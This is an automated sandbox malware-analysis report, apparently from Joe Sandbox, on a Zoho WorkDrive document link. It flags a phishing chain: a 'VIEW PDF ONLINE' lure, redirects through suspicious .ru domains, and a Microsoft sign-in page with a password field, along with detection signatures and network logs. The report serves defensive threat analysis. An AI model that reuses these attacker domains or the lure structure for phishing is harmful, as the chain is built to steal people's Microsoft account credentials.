Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4

Overview

General Information

Sample URL:https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4
Analysis ID:1586113

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
Javascript uses Websockets
HTML body contains low number of good links
HTML body with high number of embedded SVGs detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6248 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2024,i,15940426264198938828,16301918703428899327,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6756 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4Joe Sandbox AI: Page contains button: 'VIEW PDF ONLINE' Source: '1.5.pages.csv'
Source: https://wms.zohopublic.com/v2/wmsconnector.html?tabid=-1_WR_1736357506852_8595&wmsid=-1&nocache=1736357510975&frameorigin=https%3A%2F%2Fworkdrive.zohopublic.comHTTP Parser: var wms={};wms.op=/opera 5|opera\/5/i.test(navigator.useragent),wms.ie=!wms.op&&/msie/i.test(navigator.useragent),wms.pdomain="*",wms.connected=!1,wms.attached_sessions={},wms.session_map={},wms.disable=!1,wms._prd,wms._uname,wms._ticket,wms._zuid,wms._config,wms._nname,wms._sdomain,wms._rsid,wms._sid=null;var ws={},lp={};wms._maxfailurecount=3,wms.disablebind=!1,wms.consecutivefailurecnt=0,wms.lpt=new date,wms.pmoninterval=15e3,wms.wmsresponse={missedseq:{},droppedseq:{},dropdispatch:{}},wms.lastseq=[],wms.prevseq=0,wms.infoarr=[],wms.debuglimit=300,wms.attmsg,wms.url=null,wms.initcountdown=!0,wms.authtype,wms.zaid,wms.attemptwsconnection=!0,wms.consecutivewsattempts=0,wms.sessionidle=!1,wms.lastupgradeattempt=null,wms.upgradeattempts=0,wms.pausewsupgrade=!1,wms.immediate_retry_time=0,wms.is_zwaf_loaded=!1,wms.rsa_keypair_generated=!1,wms.privatekey,wms.publickey,wms.wmsidbuffer,wms.textdecoder=new textdecoder,wms.postmessage=function(opr,param){function postmsg(opr,param,meta){parent.postmessage('["'+opr+'...
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4HTTP Parser: Total embedded SVG size: 102288
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 3e79b182-8294-4cc4-8d2f-11effa4b5b92b7b46b3c-8e91-4383-a45d-9b3903b57143
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4HTTP Parser: No favicon
Source: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4HTTP Parser: No favicon
Source: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4HTTP Parser: No favicon
Source: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4HTTP Parser: No favicon
Source: https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4HTTP Parser: No favicon
Source: https://yolito.xomivarne.ru/uBWuCBti/HTTP Parser: No favicon
Source: https://yolito.xomivarne.ru/uBWuCBti/HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638719543286953576.M2U3OWIxODItODI5NC00Y2M0LThkMmYtMTFlZmZhNGI1YjkyYjdiNDZiM2MtOGU5MS00MzgzLWE0NWQtOWIzOTAzYjU3MTQz&ui_locales=en-US&mkt=en-US&client-request-id=02eaa48c-e70b-4bb2-a1aa-4bff46e1140b&state=6At09-6veMOi9AEfFtBknzyeR-WmGj7tBsEuXsiLJxFmLLW87MxNbq32Erdv3NGVqLn3ENdMyrLRH_Oh2oWJvRhdlCDPd2u-s1M2gOuSJLipkUU8ViWRT8OddVSUYbkDiwBLxvhx50pe7ViYvpoYGMI6Q9622ygGYXspGMGlo77CLJ9G_f3vzwtToJk2GCWnCk54-gGmCZVwcvuquE0LnNMj1Q3qJgsLDmT3b8zbRzU60wUnyBy5GkBFIj1X4gJ-l7SAojpUfaknxqQzqPnoUQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49887 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: workdrive.zohopublic.com
Source: global trafficDNS traffic detected: DNS query: static.zohocdn.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: js.zohocdn.com
Source: global trafficDNS traffic detected: DNS query: css.zohocdn.com
Source: global trafficDNS traffic detected: DNS query: wms.zohopublic.com
Source: global trafficDNS traffic detected: DNS query: yolito.xomivarne.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: j3aziewrw1iysjb7r2eip84ech8dxg8q5ot1uitirck9qncxvuobqqw.sprocubseq.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
